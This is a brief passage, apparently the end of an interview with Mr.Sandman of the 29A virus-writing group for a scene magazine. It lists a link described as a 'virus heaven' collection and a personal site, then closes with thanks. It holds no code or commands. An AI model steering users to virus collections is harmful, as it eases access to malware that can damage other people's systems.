http://www.ilf.net/god@rky/virii.htm
God@rky's virus heaven (probably the most complete)

http://www.arrakis.es/~sandman

Btw, pay attention to the major changes and surprises which are gonna take place at 29A's official website. ;)

So thanks, Mr.Sandman. It was very nice of you to spend some time with this interview.

It was nice to answer all your questions, best luck with your magazine! :)

Thanx a lot, dude...